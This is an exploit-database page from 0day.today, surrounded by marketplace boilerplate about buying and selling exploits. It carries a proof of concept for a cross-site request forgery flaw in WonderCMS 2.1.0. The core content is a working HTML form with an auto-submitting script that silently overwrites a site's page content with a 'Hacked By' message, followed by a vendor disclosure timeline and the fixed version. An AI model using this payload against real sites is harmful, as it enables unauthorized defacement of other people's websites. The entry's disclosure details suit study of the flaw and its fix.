0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WonderCMS 2.1.0 - Cross-Site Request Forgery Vulnerability
<!-- # Exploit Title: Cross-Site Request Forgery in WonderCMS # Date: 2017-06-19 # Exploit Author: Zerox Security Lab # Software Link: https://www.wondercms.com # Version: 2.1.0 # Twitter: https://twitter.com/ZeroxSecLab Introduction: ------------- WonderCMS is a free open source Content Management System. In other words, WonderCMS is a free website builder. WonderCMS doesn't require any configuration and can be simply unzipped and uploaded to your hosting provider. The database is a text file which you can copy, move, backup and restore easily. Proof of Concept (PoC): ------------------------ --> <html> <body> <form action="http://localhost/wonder/" method="post"> <input name="fieldname" value="title"> <input name="content" value="Hacked By 0xCode Security Lab"> <input name="target" value="pages"> <input type="submit" value="ok"> </form> </body> </html> <script> document.forms[0].submit(); </script> <!-- Disclosure Timeline: --------------------- 2017-06-16: Vulnerability found. 2017-06-17: Reported to vendor. 2017-06-17: Vendor responded and send a new version for test in it. 2017-06-17: Test new version and vulernability patched successfully. 2017-06-18: Vendor responded, update released. 2017-06-19: Public Disclosure. Fix: ---- This issue fixed in WonderCMS 2.2.0 References: ------------ https://www.wondercms.com/whatsnew https://www.wondercms.com/forum/viewtopic.php?f=8&t=885 https://github.com/robiso/wondercms/issues/36 Credits & Authors: ------------------ Zerox Security Lab --> # 0day.today [2024-11-15] #